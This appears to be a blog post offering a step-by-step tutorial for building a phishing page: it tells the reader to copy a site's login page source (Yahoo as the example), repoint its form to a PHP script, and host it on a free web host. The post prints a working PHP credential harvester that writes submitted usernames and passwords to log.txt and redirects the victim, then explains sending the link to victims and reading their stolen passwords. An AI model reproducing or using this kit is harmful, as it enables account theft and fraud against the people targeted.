How to Make a Phisher/Fake Page For Any Website



How to Make a Phisher/Fake Page For Any Website 

1. First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 
example :
              yahoo.html

2. Now open Yahoo.html (something.html) in a notepad .Now search for the string 
"action = https.." and change the address to login.php and change method = " Post" to "GET" Finally save it 



3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php



<?php
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address you can do it  by changing the www.yahoo.com to any  address you desire


4.Now create an account in Free web hosting sites, which supports php like 110mb

5. Now upload all the two files which we created Yahoo.html , login.php  

6. Now send the  Yahoo.html link to the victim , once  he enters the information and logins in , He will be redirected to the website which we did in step three

7. Now to see the victims password login to your hosting account, there you 'll see new  file log.txt , open it to see the victims user-id and password  


0 comments:

Post a Comment

Please Like this Page & Encourge

Term of Use

This blog does not host any of the files mentioned on this blog. This blog only points out to various links on the Internet that already exist and are uploaded by other websites or users there. If you have any clarifications to be made or If you find any contents in this site which you think can be offensive contact me at "boorla.pradeepkumar [at] rediffmaill . com" & the content will be removed or modified accordingly.

 
Design by | Bloggerized by praboo Kumar - | Pradeep Boorla (praboo) Kumar